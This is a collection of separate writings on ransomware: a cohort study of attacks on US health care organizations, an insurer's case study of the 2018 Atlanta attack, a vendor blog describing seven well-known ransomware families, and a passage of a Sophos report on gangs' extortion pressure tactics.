This cohort study examines the frequency and characteristics of ransomware attacks on health care delivery organizations.

Introduction

As health care delivery organizations have increased their reliance on health information technology, they have also increased their exposure to new cybersecurity risks, such as ransomware attacks. Ransomware is a type of malicious software that prevents users from accessing their electronic systems and demands a ransom to restore access. 1 , 2 Ransomware attacks are one cause of health care data breaches, which are becoming more common, 3 , 4 , 5 and are increasingly attributed to external causes (ie, hacking) rather than internal negligence or malfeasance (ie, misplaced laptops or inappropriately accessed data). 6 Unlike other data breaches, which often seek to steal data, ransomware attacks are purposefully designed to disrupt business operations, thereby motivating the attacked organization to make the demanded payment.

Although ransomware attacks have existed for years, the US Federal Bureau of Investigation (FBI) and other government entities warn that widespread use of ransomware attacks against health care delivery organizations coincides with the COVID-19 pandemic. 7 , 8 , 9 While some prominent ransomware attacks on health care delivery organizations have received considerable media attention, 10 , 11 , 12 to our knowledge, there is presently no systematic documentation of the extent and effect of ransomware attacks. News coverage of individual attacks suggests that ransomware attacks are substantially disruptive to care delivery, with reports of computers and electronic health records being disabled or encrypted, 13 , 14 , 15 , 16 , 17 clinicians forced to document care using pen and paper, 13 , 17 appointments and surgeries delayed or canceled, 11 , 14 , 16 , 18 , 19 , 20 emergency departments forced to divert ambulances, 11 , 14 , 15 , 17 , 20 and practice infrastructure so damaged that some practices have opted to close rather than try to restore systems. 21 Such instances of operational disruptions to the delivery of health care have been followed by some positing that ransomware attacks on health care delivery organizations may impose a human cost in addition to a financial one by jeopardizing patient safety and outcomes. 22 , 23 In this study, we used a database of ransomware attacks on health care delivery organizations to quantify and describe this growing phenomenon.

To conduct this study, we created a data source called the Tracking Healthcare Ransomware Events and Traits (THREAT) database and reported findings from the database. The THREAT database combines proprietary data provided by HackNotice (a cybersecurity threat intelligence company that helps businesses identify and respond to attacks) with data from the US Department of Health and Human Services Office of Civil Rights (HHS OCR) Data Breach Portal. The latter contains publicly available information that is collected when Health Insurance Portability and Accountability Act–covered entities report breaches of protected health information (PHI), as mandated by the Health Information Technology for Economic and Clinical Health Act of 2009. This study followed the Strengthening the Reporting of Observational Studies in Epidemiology ( STROBE ) reporting guidelines. This study was determined to be exempt from review and informed consent by the University of Minnesota institutional review board (common rule, category 5).

Identifying Ransomware Attacks on Health Care Delivery Organizations

The THREAT database began with every corporate cybersecurity breach within the HackNotice system. HackNotice populated this database by crawling search engines (ie, systematically querying certain terms) and web-scraping sources, such as publicly reported databases (ie, the HHS OCR Breach Portal and other state-based reporting), search engines, news outlets, trade publications, and forums on the dark web (ie, the part of the internet requiring the use of specialized encrypted browsing technology) on which hackers advertise stolen data for sale and describe the success of their exploits. Data fields recorded in this system included organization name, date of breach, type of breach (eg, ransomware, website defacement), a narrative description of the breach, and source documentation (eg, news, official reporting, dark web).

From the list of HackNotice cybersecurity breaches, we identified breaches that occurred between 2016 and 2021 for which the affected organization was a health care delivery organization operating in the US. This involved web searches for each affected company’s name and/or domain. Our definition of “health care delivery organization” was intentionally expansive, including hospitals, clinics, diagnostic laboratories, dental offices, substance use treatment centers, pharmacies, emergency medical services, and post–acute care facilities.

To determine whether each data breach involved a ransomware attack, we searched supplemental sources, including press releases issued by the attacked organization, public disclosures (ie, posted copies of form letters sent to patients whose PHI was exposed during the attack), local news reports, and health care trade press coverage. Data breaches were deemed ransomware attacks if supplemental sources included mention of “ransomware” or other keywords indicating a ransomware attack (eAppendix in the Supplement ).

Publicly Reported Exposure of PHI

To quantify the number of individuals whose PHI was exposed during a ransomware attack, we relied on publicly reported information from the HHS OCR Data Breach portal. 4 We matched attacks in the THREAT database to the HHS OCR database manually using the covered entity’s name, state, and date of breach reporting (eAppendix in the Supplement ). Organizations are statutorily required to notify HHS of a data breach and the number of individuals affected within 60 calendar days of breach discovery. 24 This information is made publicly available on the HHS website when the reported breach affects the PHI of 500 or more individuals. We additionally quantified whether a ransomware attack remained unreported to HHS OCR and the number of days that elapsed from the attack date to the reporting date.

Categorizing Health Care Delivery Organization Type and Attack Breadth

Having identified the ransomware attacks affecting health care delivery organizations in the HackNotice data, we searched the previously mentioned supplemental sources and added additional details to the THREAT database for every attack, including attack breadth and health care delivery organization type. Attack breadth was defined as whether the ransomware attack affected a single or multiple health care facilities. We also relied on supplemental data sources and the attacked organization’s web page to identify health care settings affected, categorizing delivery organizations as hospital, ambulatory surgery center, clinic, dental, mental/behavioral health, post–acute care, and other (eg, emergency medical services clinicians, plastic surgery centers, and infusion centers). eTable 1 in the Supplement provides additional detail on how we categorized health care delivery organization type and attack breadth.

Operational Disruptions

We collected reports on the type and duration of operational disruptions that occurred during ransomware attacks on health care delivery organizations. Common operational disruptions included ambulance diversion, canceled appointments/surgeries, and electronic system downtime. When available, we cataloged the duration of any operational interruption, as measured in days. Since supplemental sources frequently referenced a date at which operations were fully restored, we calculated the operational disruption duration as the number of days that elapsed from the date of the ransomware attack (ie, typically the date of the ransomware attack discovery; ransomware actors frequently have access for weeks or months before using malware that hinders operations) to the date of restoration. eTables 1 to 4 in the Supplement provide additional details on how we quantified operational disruptions and sources used.

Statistical Analysis

We calculated the annual frequency of ransomware attacks and descriptive statistics for characteristics of those attacks, including details of public reporting of PHI exposure, status of encrypted/stolen data, health care delivery organization type(s) affected, and operational disruptions. To quantify changes over time in binary outcome variables, we used logistic regression models with the year of the ransomware attack as a continuous variable. To obtain average annual marginal effects, we used the margins command in Stata, version 16.1 (StataCorp). For 2 count-based outcome variables (ie, count of individuals whose PHI was exposed and count of days during which care delivery was disrupted by the ransomware attack), we used negative binomial regression models with the year of the attack as a continuous variable. All regression analyses used Huber-White robust standard errors to assess statistical significance, which was defined as P  < .05. Analyses were conducted from May 2022 to October 2022.

During the study period (2016-2021), we documented 374 ransomware attacks on health care delivery organizations that exposed the PHI of 41 987 751 million individuals ( Figure 1 ). From 2016 to 2021, the annual number of ransomware attacks more than doubled, from 43 to 91. Personal health information exposure increased more than 11-fold, from approximately 1.3 million in 2016 to more than 16.5 million in 2021. A total of 84 ransomware attacks (22.5%) lacked information on PHI exposure, as they did not appear in the HHS OCR database ( Table 1 ). Of the 290 ransomware attacks that were reported to HHS, most (203 [54.3% percent of all attacks]) were reported outside of the legislated reporting window of 60 days following the attack.

PHI indicates personal health information.

Abbreviations: EHR, electronic health record; HHS OCR, Department of Health and Human Services Office of Civil Rights; NA, not applicable; PHI, personal health information.

Across all 374 attacks, approximately 1 in 5 (20.6%) health care organizations were reportedly able to restore data from backups ( Table 1 ). For 59 ransomware attacks (15.8%), there was evidence that ransomware actors had made some or all of the stolen PHI public, typically by posting it on dark web forums where stolen data are advertised for sale by including a subset of records.

Clinics (of all specialties) were the most common health care delivery organization type to experience a ransomware attack ( Table 1 ), followed by hospitals, other delivery organization types, ambulatory surgical centers, mental/behavioral health organizations, dental practices, and post–acute care organizations. More than half (198 [52.9%]) of all ransomware attacks affected multiple facilities within the attacked organization.

While all ransomware attacks are presumed to have some organizational effect in terms of activating system safeguards and leadership response, we documented evidence of care delivery disruptions during 166 ransomware attacks (44.4%) ( Table 1 ). A total of 32 attacks (8.6%) were associated with a disruption exceeding 2 weeks. Types of care disruptions included electronic system downtime (156 [41.7%]), delays or cancellations of scheduled care (38 [10.2%]), and ambulance diversion (16 [4.3%]). Ransomware attack-induced operational disruptions varied by health care delivery organization type, with hospitals most likely to experience a disruption during a ransomware attack ( Figure 2 ).

Ransomware attacks affecting multiple health care delivery organization types simultaneously appear in all relevant columns.

The characteristics of ransomware attacks on health care delivery organizations changed during the study period ( Table 2 ; eTable 5 in the Supplement ). With each year, ransomware attacks exposed the PHI of more patients (annual marginal effect [ME], 66 385.8; 95% CI, 3400.5-129 371.2; P  = .04), a trend that was not limited to any single health care delivery organization type ( Figure 3 A). Over time, ransomware attacks were more likely to be reported late to the HHS OCR (ME, 0.06; 95% CI, 0.03-0.08; P  < .001), and the number of attacks reported very late (ie, more than twice the statutory limit of 60 days from the attack) increased substantially in 2020 and 2021 ( Figure 3 B).

Abbreviations: EHR, electronic health record; HHS OCR, Department of Health and Human Services Office of Civil Rights; ME, marginal effect; PHI, personal health information.

Each dot represents a ransomware attack on a health care delivery organization. The 84 health care delivery organizations that experienced a ransomware attack but did not submit information to the US Department of Health and Human Services were excluded.

From 2016 to 2021, the likelihood of health care organizations restoring ransomware-encrypted or stolen data from backups decreased (ME, −0.04; 95% CI, −0.06 to −0.01; P  = .002), and more attacks were associated with some or all of the stolen PHI becoming public (ME, 0.03; 95% CI, 0-0.06; P  = .02; Table 2 ; eTable 1 in the Supplement ). During the study period, the probability that a ransomware attack affected multiple facilities simultaneously (ie, a larger organization) increased by eight percentage points annually (ME, 0.08; 95% CI, 0.05-0.10; P  < .001). Mental/behavioral health care delivery organizations (ME, 0.04; 95% CI, 0.01-0.06; P  = .001) were increasingly likely to experience ransomware attacks. While there was no statistically significant increase over time in operational disruptions overall, there was an increase in the likelihood that an attack was associated with delays or cancellations to scheduled care (ME, 0.02; 95% CI, 0.00-0.05; P  = .02) and an increase (statistically significant only at P  < .10) in the share of attacks that involved ambulance diversions (ME, 0.01; 95% CI, −0.0 to 0.03; P  = .09).

In this cohort study conducted with data from 2016 to 2021, we documented 374 ransomware attacks on health care delivery organizations that affected the PHI of nearly 42 million patients. The growing number of attacks affecting large entities (those with multiple facilities) and the associated growth in PHI exposed (along with the diminishing likelihood that an organization could restore data from backups) suggest that ransomware attacks on health care delivery organizations have increased in sophistication as well as in frequency. To our knowledge, these findings represent the only census of ransomware attacks on health care delivery organizations. However, the study’s estimates of magnitude align with findings in the gray literature, and the trend over time is consistent with reports that ransomware actors increasingly targeted health care delivery organizations during the COVID-19 pandemic. 7 , 25 , 26

Despite careful research, many of the statistics reported in this article are likely underestimates due to underreporting. For example, 1 in 5 ransomware attacks were not present in the HHS OCR database. This absence may be due to low PHI exposure (ie, attacks affecting fewer than 500 individuals need not appear in the HHS OCR public database) or, alternatively, because of confusion about whether ransomware attacks must be reported through official channels when they involve encryption, but not actual removal, of data from computer systems. Guidance from HHS states that when a ransomware attack occurs, Health Insurance Portability and Accountability Act–covered entities and their business associates need not report it if they can demonstrate a low probability that PHI has been exposed. 1 Additionally, current reporting requirements lack either an enforcement mechanism or a penalty for noncompliance. Even when an entity reports an attack, there is no sanction for doing so outside of the legislated 60-day window, which may explain the high proportion (53.5%) of ransomware attacks with delayed reporting. Rather than health care organizations self-correcting as ransomware attacks become more common, we found an increase over time in the share of attacks that were reported late. Missing attacks and delayed reporting suggest opportunities for legislators who wish to strengthen data collection around cyberattacks, particularly ransomware, so as to shape an informed and well-targeted policy response.

Other information that is currently not tracked could potentially be incorporated into the existing reporting system. For example, policy makers could require the reporting of operational disruptions (eg, whether the health care delivery organization activated electronic health record downtime protocols and/or diverted ambulances) that occurred during a cyberattack. Administrative records, such as Medicare claims data, might also be used for similar purposes if the operational disruptions during ransomware attacks leave an identifiable signature. This approach might enable data collection without imposing additional reporting requirements on health care delivery organizations during an already challenging time. However, further research is needed to establish whether ransomware attacks create identifiable patterns in administrative data.

As is, this study’s findings regarding operational disruptions required individual research into each attack. Even with this constraint, we documented disruptions to care delivery during nearly half of all ransomware attacks, but the scope of the problem is likely larger. The most frequent disruption was to electronic systems, which frequently forced a switch to paper charting. Other documented disruptions included ambulance diversion and canceled appointments. These operational disruptions may harm patients, especially those experiencing emergencies and for whom timely treatment is crucial. 9 Further study is needed to quantify an empirical association between ransomware attacks and patient outcomes.

Additional legislative activity concerns the ransom itself, with proposals to mandate disclosure (of ransom demands, whether a payment was made, and for what amount) and potentially even banning the payment of ransoms. 27 , 28 The FBI strongly recommends that businesses not acquiesce to ransom demands in the event of a ransomware attacks, since complying with ransom demands incentivizes ransomware actors to continue targeting health care organizations. Going a step further, in 1 well-documented ransomware attack, law enforcement deliberately withheld the decryption key for nearly 3 weeks while planning an operation to disrupt the ransomware actors involved. 29 To properly weigh law enforcement’s long-term deterrence goals against short-term patient safety goals, it is crucial to understand the association of ransomware attacks with patient safety and whether paying the ransom shortens the operational disruption. 22 While it is intuitive to think that paying the ransom shortens the duration of any operational disruption, this is not necessarily the case; there are well-documented examples of follow-up ransom demands and nonfunctional decryption keys provided after ransom payments have been made. 30 Additional ransom payment disclosure requirements would enable a better understanding of the potential tradeoff between financial cost and operational disruption duration.

Of equal if not more importance is identifying actions that health care delivery organizations can take to defend themselves effectively against ransomware attacks. Research suggests that health care delivery organizations are very susceptible to phishing emails that deceive insiders into giving access to hackers, 31 and such emails are a common entry point for ransomware attacks. Existing cybersecurity recommendations require substantial time and money that many, but especially the most vulnerable rural and safety net health care delivery organizations, may not realistically have. 1 , 32 Current estimates suggest that cybersecurity activities represent less than 10% of existing health system information technology budgets. 33 To motivate increased investment, rigorous research is needed to identify actions that successfully thwart ransomware and other cybersecurity attacks on health care delivery organizations.

Limitations

This study had several limitations. First, we likely omitted some ransomware attacks on health care delivery organizations. However, we believe that our database is the most comprehensive accounting of major health care ransomware attacks available for the period between 2016 and 2021. To be missing from the THREAT database, a ransomware attack would have needed to go unreported to HHS OCR, remain undetected by HackNotice web crawler surveillance and monitoring of dark web forums, and have received no press coverage in local news or health care trade publications. We believe this is most likely for ransomware attacks on smaller organizations, organizations in small geographic jurisdictions and/or organizations in states without mandated disclosure of data breaches, organizations without a hospital, and in scenarios in which the organization paid the demanded ransom quickly. The more likely scenario for omission of a ransomware attack from the THREAT database is misclassification. Events may have been ransomware attacks but only contained mention of malware or cyberattack, without discussion of any payment demand. To avoid false positives, these would not have been included in the THREAT database. Further research, including additional data sources, potentially in collaboration with the relevant federal entities (ie, the FBI, HHS OCR, the Health Sector Cybersecurity Coordination Center, and the Cybersecurity and Infrastructure Agency), is needed to validate this study’s findings.

Second, we have no insight into attempted but unsuccessful ransomware attacks (ie, a situation in which no one clicked on the phishing email link that would have compromised the system). Thus, we cannot comment on the traits of health care delivery organizations who avoid this type of cybercrime. Relatedly, we cannot attribute changes in the characteristics of ransomware attacks over time to changes in whom hackers target, the types of malware used, the market structure of health care delivery organizations (ie, as consolidation produces larger organizations, ransomware attacks are mechanically more likely to affect them), or to changes in organizational susceptibility to such cyberattacks and use of cybersecurity measures. Fourth, we likely underestimated the severity of operational disruptions and PHI exposure, as health care delivery organizations may try not to publicize these details. However, an increase in news coverage of ransomware attacks during the study period might bias us toward finding an increase in the sophistication of ransomware attacks. We noted that measures of attack sophistication and severity from multiple sources (ie, PHI exposure from the HHS OCR Data Breach Portal and operational disruptions covered by news/trade publications) yielded similar results. Fifth and finally, we could not say whether or how ransomware disruptions affect patients seeking care during an attack. Quantifying this remains a crucial area for future work.

Conclusions

The results of this cohort study suggest that from 2016 to 2021, ransomware attacks on health care delivery organizations increased in frequency and sophistication. These attacks exposed PHI and frequently disrupted health care delivery, but further research is needed to more precisely understand the operational and clinical care consequences of these disruptions. As policy makers craft legislation aimed at countering the threat of ransomware attacks across multiple industries, we urge them to focus on the specific needs of health care delivery organizations, for which operational disruptions may carry substantial implications for the quality and safety of patient care.

Supplement.

Cyber Case Study: City of Atlanta Ransomware Incident

by Kelli Young | Sep 20, 2021 | Case Study , Cyber Liability Insurance

In the spring of 2018, cybercriminals compromised several computer networks within Atlanta’s City Hall to launch a ransomware attack. From there, the cybercriminals restricted access to a wide range of online platforms, municipal operations and databases—requiring a significant ransom to be paid in exchange for restoration. Nevertheless, the city of Atlanta refused to reward the cybercriminals and did not pay the ransom. As a result, the city of Atlanta ransomware attack took several months to recover from, disrupting various government services for extended periods and costing millions of dollars in damage.

This incident has become known as one of the costliest cyberattacks to impact a local government, thus demonstrating the severity of ransomware threats. Upon reflection, there are a variety of cybersecurity lessons that organizations can learn by reviewing the details of this incident, its impact and the mistakes the city of Atlanta made along the way. Here’s what your organization needs to know.

The Details of the City of Atlanta Ransomware Attack

The attack compromised critical technology and information across Atlanta, interrupting key municipal functions within several city departments. In particular, the incident disrupted online payment programs for various services (e.g., utilities, traffic tickets and business licenses or renewals) and a multitude of law enforcement operations, including warrant issuances, inmate processing protocols and court fee payments. Further, the Atlanta Police Department lost access to practically all of its archived in-vehicle video footage and even had to temporarily resort to writing incident reports by hand.

As part of the ransomware attack, the cyber-criminals demanded the payment of over $50,000 in bitcoin before restoring any technology or information for the Atlanta government. However, the city refused to comply with the cybercriminals’ demands; government officials did not want to reward the cybercriminals’ behavior with payment, nor were they convinced that such a payment would result in restoration.

By not paying the ransom, the city was forced to recover from the attack on their own accord in the coming days, weeks and months. It took five days for the Atlanta government to regain access to critical technology. To prevent further cyber-related damages, the city kept the Wi-Fi at the Hartsfield-Jackson Atlanta International Airport disabled for 10 days following the incident until April 2. The government wasn’t able to restore its online payment programs until May, while local law enforcement couldn’t fully resume digital operations until June.

The Impact of the City of Atlanta Ransomware Attack

Following this large-scale ransomware attack, the Atlanta government encountered many consequences, including the following:

Disruption concerns First, the incident interrupted many key functions within the Atlanta government, especially payment platforms and law enforcement services. Although the city was fortunate enough to maintain control of emergency response operations (e.g., 911 dispatch) and essential community offerings (e.g., water and electricity) throughout the attack, the disrupted municipal services still caused issues for both government employees and Atlanta residents. What’s worse, many of these interruptions continued for extended periods as the city recovered from the incident, thus compounding concerns. While the Atlanta government made the right decision in not paying the ransom during this attack, it’s important to note that doing so can often lead to a prolonged incident recovery process.

Recovery expenses Next, the costs associated with recovering from the attack were severe. In total, the incident is estimated to have cost both the city and its taxpayers nearly $17 million. Breaking down these recovery expenses, the Atlanta government spent approximately $6 million in its initial response to the attack. This amount includes developing emergency contracts for assistance with recovering compromised technology; hiring a forensics team to investigate the incident further; consulting crisis communications specialists; and implementing necessary security upgrades. The remaining $11 million was spent repairing or replacing damaged government systems and technology, including desktops, laptops and smart devices. Additionally, certain information across law enforcement databases was permanently destroyed during the attack, representing an irreparable loss.

Reputational damage Lastly, the Atlanta government faced wide-spread scrutiny for its outdated cyber- infrastructure after the incident. Some IT experts blamed the city’s security failures for contributing to the severity of the attack. In fact, an audit performed just two months prior to the incident stated that there were between 1,500 and 2,000 total vulnerabilities identified within the Atlanta government’s digital operations and technology — suggesting the city had become complacent regarding cybersecurity.

Lessons Learned from the City of Atlanta Ransomware Attack

There are several cybersecurity takeaways from the City of Atlanta ransomware attack. Specifically, the incident emphasized these important lessons:

Effective access controls are critical. Because this incident originally stemmed from brute-force methods, understanding how to defend against such tactics is crucial. Specifically, if the Atlanta government had had more stringent employee access controls in place when the attack occurred, the cybercriminals may have been stopped before they could infiltrate government networks and launch the ransomware. After all, it’s much harder for cybercriminals to crack passwords and obtain access to networks when employees’ credentials come with strict security protocols. Valuable access control tactics include the following:

• Instructing employees to develop complicated and unique passwords for their accounts in addition to changing these passwords on a routine schedule
• Implementing multifactor authentication measures that require employees to verify their identities in several ways (e.g., entering a password and answering a security question)
• Limiting employees’ digital access solely to the technology, networks and data they need to perform their job responsibilities
• Segmenting different workplace networks to prevent all networks from being compromised if a single employee’s credentials are exploited

Security software is worth it. In addition to proper access controls, a wide range of security software could have helped the Atlanta government detect, mitigate and potentially prevent this attack. Although this software may seem like an expensive investment, it’s well worth it to avoid devastating cyber incidents. Essential security software to consider includes network monitoring systems, data backup and encryption services, antivirus programs, endpoint detection products and patch management tools. This software should be utilized on all workplace technology and updated regularly.

Cyber incident response plans are necessary. If the city had been prepared to respond to this incident, the recovery process likely could have been much faster and, subsequently, far less expensive than it was. Instead, the Atlanta government took several months to fully recover from this incident, ultimately increasing disruption concerns and compounding the overall costs of the attack. Such extended recovery issues emphasize how essential it is to have an effective cyber incident response plan in place. This type of plan can help an organization establish timely response protocols for remaining operational and mitigating losses in the event of a cyber event. A successful incident response plan should outline potential cyberattack scenarios, methods for maintaining key functions during these scenarios and the individuals responsible for doing so. It should be routinely reviewed through various activities—such as penetration testing and tabletop exercises—to ensure effectiveness and identify ongoing security gaps. Based on the results from these activities, the plan should be adjusted as needed.

Proper coverage can offer vital protection. Finally, this attack made it clear that no organization—not even a local government—is immune to cyberattacks and subsequent losses. What’s more, these events are increasing in both cost and frequency. That’s why it’s crucial to ensure adequate protection against cyber-related losses by securing proper coverage. Make sure your organization works with a trusted insurance professional when navigating these coverage decisions.

We can help.

In the unfortunate event that your business falls victim to a cyber attack, of any type, we can help you recover.

Cyber & Data Breach Liability coverages are developing on a daily basis as new threats emerge and new insurance companies enter the market.

Regardless of the type of business, one thing is certain, if you’re a business in operation today, you face cyber risks. Which means, you need to thoroughly understand your risk of a loss, how you would respond if a loss did occur, and whether Cyber & Data Breach Liability coverage makes sense for you.

The level of coverage your business needs is based on your individual operations and can vary depending on your range of exposure. It’s important to work with an Insurance Advisor that can identify your areas of risk, and customize a policy to fit your unique situation.

If you’d like additional information and resources, we’re here to help you analyze your needs and make the right coverage decisions to protect your operations from unnecessary risk. You can download a free copy of our  eBook , or if you’re ready make Cyber Liability Insurance a part of your insurance portfolio,  Request a Proposal  or download and get started on our  Cyber & Data Breach Insurance Application  and we’ll get to work for you.

Recent Posts

• Cyber Solutions: Defending AI Systems From Malicious Data Poisoning Attacks
• Live Well Work Well – August 2024
• Cybersecurity Awareness Programs: Benefits and Implementation
• Cyber Case Study: Colonial Pipeline Ransomware Attack
• Understanding the Difference Between Life Insurance and Annuities

7 real and famous cases of ransomware attacks

• Updated at March 19, 2021
• Threat Research , Blog

Ransomware is a type of malware that hijacks and blocks files or systems, preventing the user from having access to them. Ransomware is a hijacker. Using encryption, it holds files and systems hostage. Theoretically, when the victim pays the ransom amount, he receives the decryption key, releasing blocked files or systems.

We used the word “theoretically” because, in many cases, the victim pays the amount that was required and still doesn’t receive the key . By the way, it’s usually required that the ransom is paid in cryptocurrency, such as, for example, bitcoin and monero. The point is precisely to make it difficult to track the cybercriminal.

Ransomware has been terrifying individuals and, most importantly, companies for about 30 years. The worse is that, over time, they have become more advanced and sophisticated threats. New tactics and technologies are used, either to deceive detection solutions, to encrypt different types of files, or to convince the user to pay the ransom amount.

Both the FBI and Europol point to ransomware as one of the main threats in the digital world. In fact, the European agency says ransomware is a key cybercrime threat for years . The US agency pointed out that, in 2020, about 2,474 ransomware attacks were registered in the world , resulting in losses of more than USD 29 million.

The examples of ransomware attacks listed below show you how these attacks can work, giving an idea of the damage that ransomware do to companies and people. In this article, we’ll cover the following examples of ransomware:

Table of Contents

Check out 7 examples of ransomware attacks

1. ryuk, 2019 and 2020.

Like most infections caused by ransomware, Ryuk is spread mainly via malicious emails , or phishing emails, containing dangerous links and attachments . The ransom amount to be paid to release an entire system can exceed USD 300,000, making Ryuk one of the most expensive ransomware in history, well above the average.

According to the FBI, Ryuk’s attacks have already caused more than USD 60 million in damage worldwide since this type of ransomware gained prominence in 2018 after stopping the operations of major newspapers in the United States. More than 100 companies suffered attacks.

In 2020, for example, EMCOR Group (engineering and industrial construction company) and Epiq Global (legal services company) suffered incidents involving Ryuk.

An interesting fact is that Ryuk’s ransom notes contain contact emails with the end @protonmail.com or @tutanota.com. The victim needs to send a message to find out how much they must pay for the decryption key.

2. SamSam, 2018

SamSam ransomware was identified a few years ago, more precisely in late 2015. But it was in 2018 that it gained much more prominence after infecting the city of Atlanta, the Colorado Department of Transportation and the Port of San Diego, in the U.S., abruptly stopping services.

In the same year, two Iranian hackers were accused of using SamSam against more than 200 organizations and companies in the U.S. and Canada, including hospitals, municipalities and public institutions. A loss of USD 30 million is estimated as a result of the attacks.

Just the city of Atlanta spent more than USD 2 million to repair the damage. Hancock Health, an Indiana hospital, paid a ransom of USD 55,000. To spread, this type of ransomware often exploits vulnerabilities in Remote Desktop Protocols (RDP) and File Transfer Protocol (FTP).

A curious fact about SamSam is that the victim is asked to make a first payment for a first key, which would unlock only a few machines. It would be like a sign of honesty.

“With buying the first key you will find that we are honest”, says the ransomware message. Would you believe that?

Finding this article interesting? So you will probably like this one about 11 real and famous cases of malware attacks . Check it out!

3. WannaCry, 2017

One of the most devastating ransomware attacks in history in terms of loss volume was caused by WannaCry, launched in 2017. The estimated value at the time was USD 4 billion in losses. The amount required to release each machine was around USD 300.

WannaCry spread via email scams, or phishing. Worldwide, more than 200 thousand people and companies were affected, such as, for example, FedEx, Telefonica, Nissan and Renault. WannaCry exploits a vulnerability in Windows.

By the way, even today there are phishing emails claiming that you were infected by WannaCry, demanding ransom payment. But they’re plain emails, with no files. Pay attention!

4. Petya, 2016

Petya is a ransomware that started to be propagated in 2016, via emails with malicious attachments . Since its launch, it’s estimated that different variations of Petya have caused more than USD 10 billion in financial losses.

Petya acts by infecting the boot record of machines that use the Windows system. That is, it blocks the entire operating system. To unlock, you need to pay a ransom of around USD 300 per user.

This type of ransomware affected different organizations in the world, such as banks and companies in the areas of transportation, oil, food and health. Let us cite as an example the National Bank of Ukraine, Mondelez (food company), Merck (pharmaceutical company) and Rosneft (oil company).

5. TeslaCrypt, 2015

Like other types of ransomware, TeslaCrypt has several versions. But the attacks of this one became famous because, in the beginning, it infected game files, blocking maps and user profiles, for example. We’re talking about games like Call of Duty, Minecraft and Warcraft.

The evolved versions of TeslaCrypt were able to encrypt other files, such as PDF and Word, for example.

In any case, the victim was forced to pay at least USD 250 to release the files. But there are cases where the hijacker required USD 500 per machine.

6. CryptoLocker, 2013

The CryptoLocker ransomware has been added to our list because it was a milestone for its time. When it was launched in 2013, CryptoLocker used a large, non-standard encryption key, which has challenged cybersecurity experts.

This type of ransomware is believed to have caused losses of more than USD 3 million, infecting more than 200 thousand Windows-based computers. CryptoLocker was distributed mainly via email, using malicious files.

7. AIDS Trojan or PC Cyborg, 1989

AIDS Trojan, also known as PC Cyborg, is the first registered ransomware in history. That is why its creator, Joseph Popp, a Harvard-trained biologist, can be considered the father of ransomware.

AIDS Trojan was distributed using infected floppy disks. They were sent to participants at the World Health Organization’s international AIDS conference, in Stockholm, Sweden, in 1989.

After hiding file directories and blocking file names, this type of ransomware asked the victim to send USD 189 to a mailbox in Panama. Only then could the data be recovered. But since it had weak encryption, there were no major problems.

This story is also told in our new ebook about Ransomware . Have you seen it? We tell you everything about this type of malware.

Ransomware fighting project: No More Ransom

Have you heard of the No More Ransom (NMR) project? This is a worldwide initiative by Europol and several government agencies and cybersecurity companies to fight ransomware . Gatefy is a partner of the project.

No More Ransom helps victims of infections caused by ransomware to recover blocked data without having to pay the ransom amount. For more information, visit nomoreransom.org .

Email is the primary vector for ransomware attacks: invest in protection

In the case of a ransomware intrusion, the recommendation is to not pay the requested ransom. As seen in the cases and examples of ransomware attacks that we presented, the main form of ransomware delivery are emails. In fact, email is the platform most used by cybercriminals to commit fraud and scams.

To solve this security problem, Gatefy has an email gateway solution that protects companies of all sizes against various types of threats, including ransomware , malware , phishing and BEC (Business Email Compromise) . It’s based on artificial intelligence and machine learning . And it’s compatible with several email providers, such as Office 365 , G Suite , Exchange , and Zimbra .

We also offer a DMARC-based anti-fraud solution , so that you have control and visibility over the use of your business’s domain.

Request a demo or more information .

10 real and famous cases of BEC (Business Email Compromise)

8 reasons to use DMARC in your business

What is mail server?

• Products & Services
• Security Operations
• Threat Research
• AI Research
• Naked Security
• Sophos Life

Turning the screws: The pressure tactics of ransomware gangs

Back in 2021, Sophos X-Ops published an article on the top ten ways ransomware operators ramp up pressure on their targets, in an attempt to get them to pay. Last year, X-Ops revealed that threat actors have since developed a symbiotic relationship with sections of the media , leveraging news articles as extortion pressure. Three years on, threat actors continue to adapt and change their tactics to increase leverage against their targets.

The methods we described in the 2021 article – such as threats to publish data, calling employees, and notifying customers and the media about breaches – are all still in use today. However, ransomware gangs are adopting some new, and concerning, tactics.

A brief summary of our findings:

• Ransomware operators increasingly weaponize legitimate entities – such as the news media, legislation, civil regulatory enforcement authorities, and even law enforcement – to ramp up pressure on victims
• In some cases, criminals encourage affected customers and employees to claim compensation, or launch litigation – sometimes providing the names and contact details of CEOs and business owners
• Threat actors claim to assess stolen data for evidence of illegal activity , regulatory noncompliance, and financial discrepancies – all of which can be used as further leverage and to inflict reputational damage
• Ransomware criminals openly criticize their victims , and will sometimes attempt to deride them as unethical or negligent, which can also cause reputational damage – as well as contributing to some threat actor groups’ attempts to ‘flip the script’ and portray themselves as beneficent vigilantes
• Ransomware operators appear to be increasingly comfortable with stealing and leaking extremely sensitive data , including medical records, nude images, and, in one case (as we’ll cover later), the personal details of a CEO’s daughter

Legislation and litigation

Something we didn’t see much, if any of, in 2021 was ransomware actors weaponizing legislation, or encouraging secondary victims of their attacks – such as clients, customers, and employees – to launch lawsuits, in order to increase pressure on targeted organizations. However, we’ve seen several recent examples of this.

In November 2023, ALPHV/BlackCat filed a Security and Exchange Commission (SEC) complaint against one of its own victims . The threat actor alleged that the company had failed to notify the SEC of the breach within the four days required under the new final rules (which, while adopted in July 2023 , did not actually come into force until December of that year ).

We saw threats to expose non-compliance in other contexts, too. In some cases, it’s something for which threat actors appear to be specifically searching. As we reported in our December 2023 piece on the relationship between ransomware gangs and the media , at least one threat actor appears to be actively recruiting for people to look for instances of non-compliance and financial irregularities – possibly to use this as leverage for extortion.

Figure 1: A threat actor posts a recruitment ad on a criminal forum, seeking someone to look for “violations,” “inappropriate spending,” “discrepancies,” and “cooperation with companies on sanction lists.” It’s not clear that this is linked specifically to ransomware

It’s worth noting that this sort of activity can require considerable expertise – as noted by one threat actor on a criminal forum below (Figure 2) – but is likely still attractive to ransomware operators if it provides them with more ammunition.

Figure 2: A threat actor provides some advice on finding “inconsistencies in tax reporting” on a criminal forum

At least one other ransomware group claims to do this type of research. The WereWolves threat actor notes, on its leak site, that it subjects stolen data to “a criminal legal assessment, a commercial assessment and an assessment in terms of insider information for competitors.”

Figure 3: An excerpt from the WereWolves ransomware leak site

We noted one particularly disturbing example, where the Monti ransomware gang claimed that an employee at a compromised organization had been searching for child sexual abuse material. The threat actor posted a screenshot of a browser history window, along with a PowerShell window showing the alleged username of the offender. Monti went on to state that “if they don’t pay up, we’ll be forced to turn over the abuse information to the authorities, and release the rest of the information to the public.”

